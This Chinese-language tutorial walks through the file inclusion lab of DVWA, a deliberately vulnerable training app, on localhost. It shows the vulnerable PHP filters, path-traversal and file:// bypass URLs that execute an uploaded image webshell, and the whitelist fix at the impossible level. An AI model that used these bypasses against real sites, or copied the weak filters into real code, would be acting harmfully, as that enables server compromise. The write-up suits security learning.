文件包含漏洞原理
在web应用中,开发人员为了提高开发效率,通常会把多个页面存在的共用功能编写在一个文件 中,当其他页面需要使用的时候,利用文件包含的函数就可以调用这部分的代码。如果服务器配置不当或者对用户输入的数据过滤不严,就会导致用户可以修改文件包含的地址,操作意料之外的文件或进行恶意代码注入。
文件包含用到的函数
require:找不到被包含的文件,报错,并且停止运行脚本。
include:找不到被包含的文件,只会报错,但会继续运行脚本。
require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。
include_once:与include类似,区别在于当重复调用同一文件时,程序只调用一次。
文件包含的特征
?page=a.php
?home=b.html
?file=content
1.Low等级
源代码
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
可以看到low等级没有做任何过滤。首先尝试一下包含一个不存在的文件。
http://127.0.0.1/dvwa/dvwa/vulnerabilities/fi/?page=1234.php
通过返回结果可以看到已经把网站的绝对路径给爆出来了。
这样可以利用文件上传加文件包含的组合拳来进行进一步操作。通过文件上传个图片马,然后通过文件包含执行该图片。
http://127.0.0.1/dvwa/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/3.jpg
可以看到通过文件包含,该图片马已经被当做php文件来执行了。
2.Medium等级
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
通过源代码可以看到过滤了http://和https://以及…/和…
我们可以通过文件的绝对路径来包含文件
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=D:\phpstudy_pro\WWW\dvwa\dvwa\hackable\uploads\3.jpg
High等级
查看源代码
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
high级别的代码对包含的文件名进行了限制,必须为 file* 或者 include.php ,否则会提示Error:File not found
我们可以通过file协议来进行绕过。
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///D:\phpstudy_pro\WWW\dvwa\hackable\uploads\3.jpg
发现文件执行成功
impossible等级
查看源代码
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
可以看到,impossible级别的代码使用了白名单过滤的方法,包含的文件名只能等于白名单中的文件,所以避免了文件包含漏洞的产生。